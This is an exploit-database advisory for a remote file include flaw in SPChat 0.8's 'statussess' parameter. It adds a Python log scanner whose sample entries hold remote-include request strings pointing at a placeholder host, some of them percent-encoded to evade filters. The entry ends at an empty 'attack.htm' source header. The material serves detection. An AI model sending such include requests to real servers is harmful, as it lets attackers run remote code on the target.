SPChat 0.8 Module Remote File Include Vulnerability

ID EDB-ID:22717
Type exploitdb
Reporter Rynho Zeros Web
Modified 2003-06-02T00:00:00


SPChat 0.8 Module Remote File Include Vulnerability. Webapps exploit for php platform

source: http://www.securityfocus.com/bid/7780/info

SPChat has been reported prone to a remote file include vulnerability.

The issue results from insufficient sanitization of the user-supplied URI variable 'statussess' by the SPChat module. A remote attacker can include a malicious file in a URL.

This vulnerability was reported to affect SPChat version 0.8; other versions may also be affected.
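
For detection, the check below scans web server access logs for requests whose 'statussess' parameter carries a reference to another host. It is an added example, not code from the advisory or from SPChat; it assumes common/combined log format, and the request path, addresses and host names in the sample entries are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "statussess"  # the parameter named in the advisory
# Value that points at another host: "scheme://..." or protocol-relative "//host"
REMOTE_REF = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)
# Request target inside a common/combined-format access log entry
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252F) up to a bounded depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_statussess(log_line):
    """Return the decoded remote reference carried in statussess, or None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == PARAM and REMOTE_REF.match(fully_unquote(value)):
            return fully_unquote(value)
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = remote_statussess(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample entries: addresses, hosts and the request path are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Jun/2003:10:00:01 +0000] "GET /PLACEHOLDER/index.php?statussess=http://files.example.net/inc.txt HTTP/1.0" 200 512',
    '203.0.113.5 - - [02/Jun/2003:10:00:02 +0000] "GET /PLACEHOLDER/index.php?statussess=%68ttp%3A%2F%2Ffiles.example.net%2Finc.txt HTTP/1.0" 200 512',
    '203.0.113.5 - - [02/Jun/2003:10:00:03 +0000] "GET /PLACEHOLDER/index.php?statussess=%252F%252Ffiles.example.net%252Finc.txt HTTP/1.0" 200 512',
    '198.51.100.7 - - [02/Jun/2003:10:00:04 +0000] "GET /PLACEHOLDER/index.php?statussess=1 HTTP/1.0" 200 512',
    '198.51.100.7 - - [02/Jun/2003:10:00:05 +0000] "GET /PLACEHOLDER/index.php?page=http://files.example.net/ HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: statussess -> {value}")
```

The nested-encoding entry is flagged as probing even though a server that decodes only once would not treat it as a remote reference.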


----- Source Code For attack.htm -----